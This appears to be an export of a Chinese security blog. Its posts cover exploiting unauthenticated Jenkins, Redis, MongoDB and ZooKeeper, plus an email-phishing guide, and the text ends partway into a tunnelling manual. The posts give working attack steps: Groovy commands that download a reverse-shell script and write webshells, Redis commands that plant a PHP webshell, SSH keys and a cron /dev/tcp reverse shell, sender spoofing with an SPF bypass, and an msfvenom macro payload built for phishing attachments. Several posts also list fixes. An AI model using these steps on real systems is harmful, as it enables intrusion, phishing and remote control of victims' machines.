<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>hvv</category>
        <category>rce</category>
      </categories>
      <tags>
        <tag>hvv</tag>
        <tag>rce</tag>
        <tag>poc</tag>
      </tags>
  </entry>
  <entry>
    <title>JenKins 未授权访问</title>
    <url>/2023/05/16/jenkins/</url>
    <content><![CDATA[<div class="note red icon-padding flat"><i class="note-icon fas fa-fan"></i><p>方糖的博客</p>
</div>

<div class="note orange icon-padding flat"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding flat"><i class="note-icon fas fa-bullhorn"></i><p>新的一年快到了….</p>
</div>

<div class="note purple icon-padding flat"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline blue"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>05-16</p>
</div></div><div class='timeline-item-content'><p>永远新的开始啊</p>
<h1 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h1><p>默认情况下 Jenkins 面板中用户可以选择执行脚本界面来操作一些系统层命令，攻击者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。</p>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><p>命令执行地址</p>
<p><a href="http://192.168.56.114:8080/script">http://192.168.56.114:8080/script</a></p>
<p><a href="http://192.168.56.114:8080/manage">http://192.168.56.114:8080/manage</a></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">命令执行</span><br><span class="line">println <span class="string">&quot;ifconfig -a&quot;</span>.execute().text    执行ifconfig  命令</span><br><span class="line">println <span class="string">&quot;wget  http://127.0.0.1/1.py&quot;</span>.execute().text     下载py文件反弹shell</span><br><span class="line"></span><br><span class="line">写文件shell</span><br><span class="line">new File(<span class="string">&quot;/tmp/1.py&quot;</span>).write(<span class="string">&quot;&quot;</span><span class="string">&quot;</span></span><br><span class="line"><span class="string">1</span></span><br><span class="line"><span class="string">2</span></span><br><span class="line"><span class="string">3</span></span><br><span class="line"><span class="string">&quot;</span><span class="string">&quot;&quot;</span>);      使用命令写入文件1.py 随后执行命令反弹</span><br><span class="line"></span><br><span class="line">写websehll 文件</span><br><span class="line">new File(<span class="string">&quot;/var/www/html/1.php&quot;</span>).write(<span class="string">&quot;&quot;</span><span class="string">&quot;</span></span><br><span class="line"><span class="string">1</span></span><br><span class="line"><span class="string">2</span></span><br><span class="line"><span class="string">3</span></span><br><span class="line"><span class="string">&quot;</span><span class="string">&quot;&quot;</span>);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="修复建议"><a href="#修复建议" class="headerlink" title="修复建议"></a>修复建议</h1><ul>
<li>禁止 jenkins 暴露在公网</li>
<li>添加认证,设置复杂密码以及账号锁定</li>
</ul>
<h1 id="相关CVE"><a href="#相关CVE" class="headerlink" title="相关CVE"></a>相关CVE</h1><p>CVE-2017-1000353</p>
<p>CVE-2018-1000861</p>
</div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>未授权访问</category>
        <category>jenkins</category>
      </categories>
      <tags>
        <tag>未授权访问</tag>
        <tag>jenkins</tag>
      </tags>
  </entry>
  <entry>
    <title>邮件钓鱼上线</title>
    <url>/2023/05/19/mailfish/</url>
    <content><![CDATA[<div class="note red icon-padding flat"><i class="note-icon fas fa-fan"></i><p>奇奇怪怪</p>
</div>

<div class="note orange icon-padding flat"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding flat"><i class="note-icon fas fa-bullhorn"></i><p>新的一天开始了</p>
</div>

<div class="note purple icon-padding flat"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline pink"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>05-19</p>
</div></div><div class='timeline-item-content'><h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>邮件渗透技术</p>
<h1 id="流程"><a href="#流程" class="headerlink" title="流程"></a>流程</h1><h2 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h2><p><strong><strong>方式一：</strong></strong></p>
<ul>
<li>寻找目标邮件服务器以及 web 端邮箱入口</li>
<li>获取目标 web 网站，拿到真实 ip （如 MX 记录获取真实ip，第三方邮件服务器此方式失效）</li>
<li>随后对获取到的目标真实 ip 进行 C 段扫描。针对目标常用邮件协议端口25,109,110,143,465,995,993,994 。</li>
</ul>
<p><strong>方式二：</strong></p>
<ul>
<li>通过子域名扫描，获取目标子域名，从中筛选出可能与邮件服务有关的域名</li>
</ul>
<p><strong><strong><strong><strong><strong><strong>方式三：</strong></strong></strong></strong></strong></strong></p>
<ul>
<li>通过搜索引擎语法爬取</li>
</ul>
<p>site:target.com intitle:”Outlook Web App”</p>
<p>site:target.com intitle:”mail”</p>
<p>site:target.com intitle:”webmail”</p>
<p>Shodan、fofa、zoomeye搜索等。</p>
<ul>
<li>第三方网站批量搜集目标邮箱</li>
</ul>
<p><a href="https://hunter.io/">https://hunter.io/</a></p>
<p><a href="http://www.skymem.info/">http://www.skymem.info/</a></p>
<p><a href="https://www.email-format.com/i/search/">https://www.email-format.com/i/search/</a></p>
<p><a href="https://github.com/laramies/theHarvester">https://github.com/laramies/theHarvester</a> 邮件信息侦查工具，kali 集成</p>
<h1 id="验证邮件地址"><a href="#验证邮件地址" class="headerlink" title="验证邮件地址"></a>验证邮件地址</h1><p><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong>通过工具查询邮件地址是否存在</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></p>
<ul>
<li><a href="https://mailtester.com/testmail.php">https://mailtester.com/testmail.php</a></li>
<li><a href="https://github.com/Tzeross/verifyemail">https://github.com/Tzeross/verifyemail</a></li>
</ul>
<h1 id="邮箱爆破"><a href="#邮箱爆破" class="headerlink" title="邮箱爆破"></a>邮箱爆破</h1><ul>
<li>如果目标邮箱并非第三方邮箱，如百度，新浪，阿里，腾讯等等邮箱，可以使用密码爆破的手段获取目标邮箱密码，进行钓鱼。</li>
</ul>
<h1 id="临时邮件"><a href="#临时邮件" class="headerlink" title="临时邮件"></a>临时邮件</h1><ul>
<li><a href="https://www.linshi-email.com/">https://www.linshi-email.com/</a></li>
<li><a href="https://mail.cx/zh/">https://mail.cx/zh/</a></li>
</ul>
<h1 id="邮件伪造"><a href="#邮件伪造" class="headerlink" title="邮件伪造"></a>邮件伪造</h1><ul>
<li>SPF: 可以大致理解它的作用是确认邮件的ip地址到底是不是在它域名的spf记录里面，如果在的话，就说明一封正确的邮件，不是的话就会被丢弃。SPF是为了防范垃圾邮件而提出来的一种DNS记录类型，它是一种TXT类型的记录，它用于登记某个域名拥有的用来外发邮件的所有IP地址。</li>
<li>DKIM:它的作用主要是来校验邮件数据在传输过程中是否被修改过，也可以简单的理解为确保邮件在发送过程中的完整性。主要步骤：</li>
</ul>
<ol>
<li>发件人域名签名：发件人通过私钥对邮件头和正文进行数字签名，并将签名结果添加到邮件头中。</li>
<li>DNS记录验证：接收邮件服务器在收到邮件后，会从DNS记录中获取发件人域名的公钥，用于验证邮件头中的签名结果是否正确。</li>
<li>签名验证：邮件接收方使用公钥验证邮件头中的签名结果，并对比签名前后的邮件头和正文内容是否一致，以确定邮件来源是否被篡改或伪造。</li>
</ol>
<p><strong>方式：</strong></p>
<ul>
<li>一般情况下没有SPF可以 直接用swaks工具伪造。</li>
</ul>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">swaks --body <span class="string">&quot;test111 mail 内容&quot;</span> --header <span class="string">&quot;subject:mail title标题&quot;</span> --ehlo <span class="string">&quot;mail ehlo head&quot;</span>  -t lfpqjqqmrl@iubridge.com  -f admin@qq.com</span><br><span class="line">使用swaks 发送邮件</span><br><span class="line">参数说明</span><br><span class="line">swaks –to <span class="built_in">test</span>@qq.com //首先测试邮箱的连通性；</span><br><span class="line"></span><br><span class="line">            –to <span class="built_in">test</span>@gmail.com //接件人邮箱；</span><br><span class="line">            –from <span class="built_in">test</span>@qq.com //发件人邮箱；</span><br><span class="line">            –ehlo qq.com //伪造邮件ehlo头，即是发件人邮箱的域名。提供身份认证；</span><br><span class="line">            –server mail.smtp2go.com //服务邮件域</span><br><span class="line">            –body “<span class="built_in">test</span>” //引号中的内容即为邮件正文，可直接引用文件；</span><br><span class="line">            –data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件，再作为正常邮件发送；</span><br><span class="line">            –header “Subject:标题” //邮件标题;</span><br><span class="line">            –header-X-Mailer gmail.com //X-Mailer标头表示用于起草和发送原始电子邮件的程序</span><br><span class="line">            –h-From: ‘boss admin@gmail.com‘ //伪造的发件人邮箱；</span><br><span class="line">            –attach /root/test.txt //附件</span><br></pre></td></tr></table></figure>

<h1 id="SPF-绕过"><a href="#SPF-绕过" class="headerlink" title="SPF 绕过"></a>SPF 绕过</h1><p>在有SPF的情况下，就需要绕过SPF,可以使用swaks+smtp2go，需要借助到邮件托管平台来绕过SPF监测。</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">swaks --to xxx@163.com </span><br><span class="line">--from  admin@gov.com  </span><br><span class="line">--ehlo  xxx  </span><br><span class="line">--body  “hello ，i<span class="string">&#x27;m 007&quot;</span></span><br><span class="line"><span class="string">--server mail.smtp2go.com -p 2525 -au user -ap pass</span></span><br><span class="line"><span class="string">使用邮件托管平台代发绕过</span></span><br></pre></td></tr></table></figure>

<h1 id="钓鱼文件"><a href="#钓鱼文件" class="headerlink" title="钓鱼文件"></a>钓鱼文件</h1><ul>
<li>宏文件</li>
</ul>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">可以使用Metasploit中的msfvenom来生成带有恶意宏的Word文档。</span><br><span class="line">下面是一个简单的示例步骤：</span><br><span class="line"></span><br><span class="line">1.生成payload：使用msfvenom生成恶意的payload。例如，要生成一个Meterpreter的payload，输入以下命令：</span><br><span class="line"></span><br><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=&lt;attacker IP&gt; LPORT=&lt;attacker port&gt; -f vba &gt; payload.vba</span><br><span class="line"></span><br><span class="line">其中，LHOST参数为攻击者IP地址，LPORT参数为攻击者监听的端口号。</span><br><span class="line"></span><br><span class="line">2.编写Word文档：创建一个新的Word文档，并添加一个宏。在宏中，使用ActiveDocument.VBProject.VBComponents.Import方法将生成的payload.vba导入到Word文档中。</span><br><span class="line"></span><br><span class="line">3.发送邮件：将带有恶意宏的Word文档作为附件发送给目标用户。</span><br></pre></td></tr></table></figure>

<ul>
<li>伪造扩展名 kilerrat 工具</li>
<li>文件捆绑</li>
<li>CHM钓鱼</li>
</ul>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">**CHM简介**</span><br><span class="line"></span><br><span class="line">CHM是微软推出的基于HTML的帮助文件系统，被 IE 浏览器支持的JavaScript, VBScript, ActiveX,等</span><br><span class="line">CHM同样支持。因此使用CHM作为钓鱼的payload非常合适。本文总结了两种基于CHM执行命令的方式。</span><br><span class="line"></span><br><span class="line">************************************使用com控件命令执行</span><br><span class="line">使用了js调用com控件执行命令</span><br><span class="line">&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;<span class="built_in">head</span>&gt;&lt;title&gt;Mousejack replay&lt;/title&gt;&lt;<span class="built_in">head</span>&gt;&lt;/head&gt;&lt;body&gt;</span><br><span class="line"><span class="built_in">command</span> <span class="built_in">exec</span> </span><br><span class="line">&lt;OBJECT <span class="built_in">id</span>=x classid=<span class="string">&quot;clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11&quot;</span> width=1 height=1&gt;</span><br><span class="line">&lt;PARAM name=<span class="string">&quot;Command&quot;</span> value=<span class="string">&quot;ShortCut&quot;</span>&gt;</span><br><span class="line"> &lt;PARAM name=<span class="string">&quot;Button&quot;</span> value=<span class="string">&quot;Bitmap::shortcut&quot;</span>&gt;</span><br><span class="line"> &lt;PARAM name=<span class="string">&quot;Item1&quot;</span> value=<span class="string">&#x27;,calc.exe&#x27;</span>&gt;</span><br><span class="line"> &lt;PARAM name=<span class="string">&quot;Item2&quot;</span> value=<span class="string">&quot;273,1,1&quot;</span>&gt;</span><br><span class="line">&lt;/OBJECT&gt;</span><br><span class="line">&lt;SCRIPT&gt;</span><br><span class="line">x.Click();</span><br><span class="line">&lt;/SCRIPT&gt;</span><br><span class="line">&lt;/body&gt;&lt;/html&gt;************************************</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<ul>
<li>CVE-2018-2174</li>
<li>Windows 快捷键</li>
<li>构造DDE钓鱼文档</li>
<li>word 中插入外部对象(OLE)方式欺骗</li>
<li>IQY特性钓鱼</li>
<li>PPT 动作按钮特性构造 PPSX钓鱼</li>
<li>RAR解压钓鱼</li>
</ul>
<h1 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h1><ul>
<li><a href="https://mp.weixin.qq.com/s/aatNjey3swZz7T4Yw_LqsQ">https://mp.weixin.qq.com/s/aatNjey3swZz7T4Yw_LqsQ</a></li>
</ul>
</div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>社会工程学</category>
        <category>邮件钓鱼</category>
      </categories>
      <tags>
        <tag>邮件钓鱼</tag>
      </tags>
  </entry>
  <entry>
    <title>MongoDB 未授权访问</title>
    <url>/2023/05/16/mongodb/</url>
    <content><![CDATA[<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>方糖的博客</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>新的一年快到了….</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline #5effff"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>05-16</p>
</div></div><div class='timeline-item-content'><h1 id="漏洞介绍"><a href="#漏洞介绍" class="headerlink" title="漏洞介绍"></a>漏洞介绍</h1><p>默认开启 MongoDB 服务不添加任何参数时，是没有任何权限验证的，可以直接无密码连接登陆，端口 27017</p>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">mongo  --host ip  --port 27017  直接连接数据库</span><br></pre></td></tr></table></figure>

<h1 id="漏洞加固"><a href="#漏洞加固" class="headerlink" title="漏洞加固"></a>漏洞加固</h1><ul>
<li>为 MongoDB 添加认证</li>
<li>启动时候添加 —auth参数</li>
<li>给 MongoDB 添加用户</li>
</ul>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">use admin <span class="comment">#使用admin库</span></span><br><span class="line"></span><br><span class="line">db.addUser(<span class="string">&quot;root&quot;</span>, <span class="string">&quot;123456&quot;</span>) <span class="comment">#添加用户名root密码123456的用户</span></span><br><span class="line"></span><br><span class="line">db.auth(<span class="string">&quot;root&quot;</span>,<span class="string">&quot;123456&quot;</span>) <span class="comment">#验证下是否添加成功，返回1说明成功</span></span><br></pre></td></tr></table></figure>

<ul>
<li>禁用HTTP 和REST 端口</li>
</ul>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">MongoDB 自身带有一个 HTTP 服务和并支持 REST 接口。</span><br><span class="line">在2.6以后这些接口默认是关闭的。mongoDB 默认会使用默认端口监听web服务，</span><br><span class="line">一般不需要通过 web 方式进行远程管理，建议禁用。</span><br><span class="line">修改配置文件或在启动的时候选择 –nohttpinterface 参数 nohttpinterface=<span class="literal">false</span></span><br></pre></td></tr></table></figure>

<ul>
<li>限制绑定ip</li>
</ul>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">启动时加入参数--bind_ip 127.0.0.1</span><br><span class="line"></span><br><span class="line">或在/etc/mongodb.conf文件中添加以下内容：bind_ip = 127.0.0.1</span><br></pre></td></tr></table></figure>

</div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>未授权访问</category>
        <category>MongoDB</category>
      </categories>
      <tags>
        <tag>未授权访问</tag>
        <tag>漏洞复现</tag>
        <tag>MongoDB</tag>
      </tags>
  </entry>
  <entry>
    <title>redis 未授权访问</title>
    <url>/2023/05/15/redis/</url>
    <content><![CDATA[<div class="note red icon-padding flat"><i class="note-icon fas fa-fan"></i><p>方糖的博客</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>新的一年快到了….</p>
</div>

<div class="note purple icon-padding flat"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline pink"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>05-15</p>
</div></div><div class='timeline-item-content'><p>永远新的开始啊</p>
<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>Redis 在某些情况下，绑定在0.0.0.0 暴露公网访问的时候，没有防火墙策略，没有密码认证的情况下，会导致任意目标访问 redis 以及读取写入数据。</p>
<h1 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h1><ul>
<li>绑定在 0.0.0.0:6379，没有安全策略ip限制，直接暴露在公网</li>
<li>没有设置 redis 密码认证，可以免密码登陆</li>
<li>高级利用，root 身份运行</li>
</ul>
<h1 id="复现环境"><a href="#复现环境" class="headerlink" title="复现环境"></a>复现环境</h1><ul>
<li>centos 7</li>
<li>redis <code>wget http://download.redis.io/releases/redis-4.0.8.tar.gz</code></li>
</ul>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">cd</span> redis</span><br><span class="line">make</span><br><span class="line">make install 将redis-cli redis-server 安装到/usr/bin</span><br><span class="line"><span class="built_in">cp</span> redis.conf /etc</span><br><span class="line">修改redis.conf 配置文件 <span class="built_in">bind</span> 0.0.0.0,关闭密码认证，关闭服务器防火墙</span><br><span class="line">root启动</span><br></pre></td></tr></table></figure>

<h1 id="复现过程"><a href="#复现过程" class="headerlink" title="复现过程"></a>复现过程</h1><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">安装 redis-cli</span><br><span class="line">yay -S redis</span><br><span class="line">redis-cli -h 192.168.56.110  连接redis</span><br><span class="line"></span><br><span class="line">**数据泄漏**</span><br><span class="line">keys *   获取所有 keys 值</span><br><span class="line"></span><br><span class="line">**系统信息**</span><br><span class="line">info    获取系统信息，redis版本，系统信息等</span><br><span class="line"></span><br><span class="line">**webshell**</span><br><span class="line"><span class="comment"># 写入一个string内容</span></span><br><span class="line"><span class="built_in">set</span> shell <span class="string">&quot;\n\n&lt;?=`<span class="variable">$_GET</span>[0]`?&gt;\n\n&quot;</span>    \n换行，防止写入数据混乱</span><br><span class="line"><span class="comment"># 设置备份目录</span></span><br><span class="line">config <span class="built_in">set</span> <span class="built_in">dir</span> /var/www/html/</span><br><span class="line"><span class="comment"># 设置备份文件名</span></span><br><span class="line">config <span class="built_in">set</span> dbfilename shell.php</span><br><span class="line"><span class="comment"># 保存文件到本地</span></span><br><span class="line">save</span><br><span class="line"></span><br><span class="line">**写入 SSH 公钥登陆无密码登陆目标系统**</span><br><span class="line"></span><br><span class="line">ssh-keygen -t rsa　　//执行生成key命令</span><br><span class="line"></span><br><span class="line"><span class="comment"># 备份文件目录设置为对应的 .ssh，一般默认为 /root/.ssh/</span></span><br><span class="line"></span><br><span class="line">config <span class="built_in">set</span> <span class="built_in">dir</span> /root/.ssh/</span><br><span class="line"></span><br><span class="line">config <span class="built_in">set</span> dbfilename authorized_keys</span><br><span class="line"></span><br><span class="line"><span class="comment"># 保存key的时候加上两个`\n`是为了避免和Redis里其他缓存数据混合</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">set</span> key <span class="string">&quot;\n\n\生成的公钥n\n&quot;</span></span><br><span class="line"></span><br><span class="line">save</span><br><span class="line"></span><br><span class="line">**写入计划任务 crontab 运行命令，获取shell**</span><br><span class="line"></span><br><span class="line"><span class="built_in">set</span> shell <span class="string">&quot;\n\n*/1 * * * * /bin/bash -i&gt;&amp;/dev/tcp/192.168.110.141/4789 0&gt;&amp;1\n\n&quot;</span></span><br><span class="line"></span><br><span class="line">config <span class="built_in">set</span> <span class="built_in">dir</span> /var/spool/cron/</span><br><span class="line"></span><br><span class="line">config <span class="built_in">set</span> dbfilename root</span><br><span class="line"></span><br><span class="line">save</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="修复方式"><a href="#修复方式" class="headerlink" title="修复方式"></a><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong><strong>修复方式</strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></strong></h1><ul>
<li>bind 127.0.0.1  只对本地开放</li>
<li>requirepass password  设置密码认证</li>
<li>修改默认端口</li>
<li>设置防火墙规则</li>
</ul>
</div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>未授权访问</category>
        <category>redis</category>
      </categories>
      <tags>
        <tag>redis</tag>
      </tags>
  </entry>
  <entry>
    <title>ZooKeeper 未授权访问</title>
    <url>/2023/05/16/zookeeper/</url>
    <content><![CDATA[<div class="note red icon-padding flat"><i class="note-icon fas fa-fan"></i><p>方糖的博客</p>
</div>

<div class="note orange icon-padding flat"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding flat"><i class="note-icon fas fa-bullhorn"></i><p>新的一年快到了….</p>
</div>

<div class="note purple icon-padding flat"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline green"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2023</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>05-16</p>
</div></div><div class='timeline-item-content'><h1 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h1><p>Zookeeper 的默认开放端口是2181。Zookeeper 安装部署之后默认情况下不需要任何身份验证，造成攻击者可以远程利用 Zookeeper，通过服务器收集敏感信息或者在 Zookeeper 集群内进行破坏</p>
<p>比如：kill命令。攻击者能够执行所有只允许由管理员运行的命令。</p>
<p>默认运行在 2181 端口</p>
<h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14-bin.tar.gz</span><br><span class="line"></span><br><span class="line">tar -xvf  filename.tar.gz  解包</span><br><span class="line"><span class="built_in">cd</span>  zookeeper/src       </span><br><span class="line"><span class="built_in">mv</span> zoo_sample.cfg zoo.cfg   进入目录修改配置文件名称未zoo.cfg</span><br><span class="line">../bin/zkServer.sh start 启动服务</span><br></pre></td></tr></table></figure>

<h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">echo</span> conf | nc xx.xx.xx.xx 2181   </span><br><span class="line">conf命令输出相关服务配置的详细信息，端口、数据路径、日志路径、session 超时时间，最大连接数等。</span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span> cons | nc xx.xx.xx.xx 2181 | more</span><br><span class="line">列出所有连接到当前服务器的客户端/会话的详细信息</span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span> dump | nc xx.xx.xx.xx 2181 | more</span><br><span class="line">输出未处理的会话和临时节点，leader 节点有效。</span><br><span class="line"></span><br><span class="line"><span class="built_in">echo</span> envi | nc xx.xx.xx.xx 2181</span><br><span class="line">输出服务器详细信息</span><br><span class="line"></span><br><span class="line">./zkCli.sh -server x.x.x.x:2181  </span><br><span class="line">直接连接服务测试，执行命令</span><br></pre></td></tr></table></figure>

<h1 id="漏洞修复"><a href="#漏洞修复" class="headerlink" title="漏洞修复"></a>漏洞修复</h1><ul>
<li>禁止把 Zookeeper 直接暴露在公网</li>
<li>添加访问控制，根据情况选择对应方式（认证用户，用户名密码）</li>
<li>绑定指定 IP 访问</li>
</ul>
</div></div></div>

<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>啊，再见了，再见了，哈</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>我们会再见的对么</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>再见你要幸福</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>燕子，燕子</p>
</div>

]]></content>
      <categories>
        <category>未授权访问</category>
        <category>ZooKeeper</category>
      </categories>
      <tags>
        <tag>ZooKeeper</tag>
      </tags>
  </entry>
  <entry>
    <title>流量隧道手册</title>
    <url>/2024/02/20/%E6%B5%81%E9%87%8F%E9%9A%A7%E9%81%93/</url>
    <content><![CDATA[<div class="note red icon-padding modern"><i class="note-icon fas fa-fan"></i><p>奇奇怪怪</p>
</div>

<div class="note orange icon-padding modern"><i class="note-icon fas fa-battery-half"></i><p>安全小技巧</p>
</div>

<div class="note blue icon-padding modern"><i class="note-icon fas fa-bullhorn"></i><p>新的一天开始了</p>
</div>

<div class="note purple icon-padding modern"><i class="note-icon far fa-hand-scissors"></i><p>剪刀石头布,哈，我又赢了 </p>
</div>

<div class="timeline pink"><div class='timeline-item headline'><div class='timeline-item-title'><div class='item-circle'><p>2024</p>
</div></div></div><div class='timeline-item'><div class='timeline-item-title'><div class='item-circle'><p>02-20</p>
</div></div><div class='timeline-item-content'><aside>
</aside>
---

<h1 id="🐸-简介"><a href="#🐸-简介" class="headerlink" title="🐸 简介"></a>🐸 简介</h1><aside>
⚙ 文章针对代理隧道的分析，多种工具的选择与使用，以及对于安全行业人员的意义与方案，并在多种场景下进行测试使用，分析其特点，区别。

</aside>

<hr>
<h2 id="关于流量隧道-🌵"><a href="#关于流量隧道-🌵" class="headerlink" title="关于流量隧道 🌵"></a>关于流量隧道 🌵</h2><blockquote>
<p>流量隧道（Traffic Tunnel）是一种网络技术，用于将网络流量通过一个加密和隧道化的通道传输，以保护数据的安全性和隐私性。它可以用于各种目的，包括绕过网络限制、保护通信内容免受窃听、隐藏真实的网络流量等。</p>
</blockquote>
<p>流量隧道的工作原理是将原始的网络流量封装在另一个协议的数据包中，以隐藏原始数据的内容和目的地。这些封装的数据包经过加密和隧道化处理后，在网络上传输到目标地点，然后被解封和还原为原始的网络流量。</p>
<p>流量隧道可以通过多种协议实现，其中比较常见的包括虚拟专用网络（VPN）、代理服务器和TOR（The Onion Router）等。这些技术都可以创建一个安全的通道，使用户能够匿名访问互联网或绕过地理限制。</p>
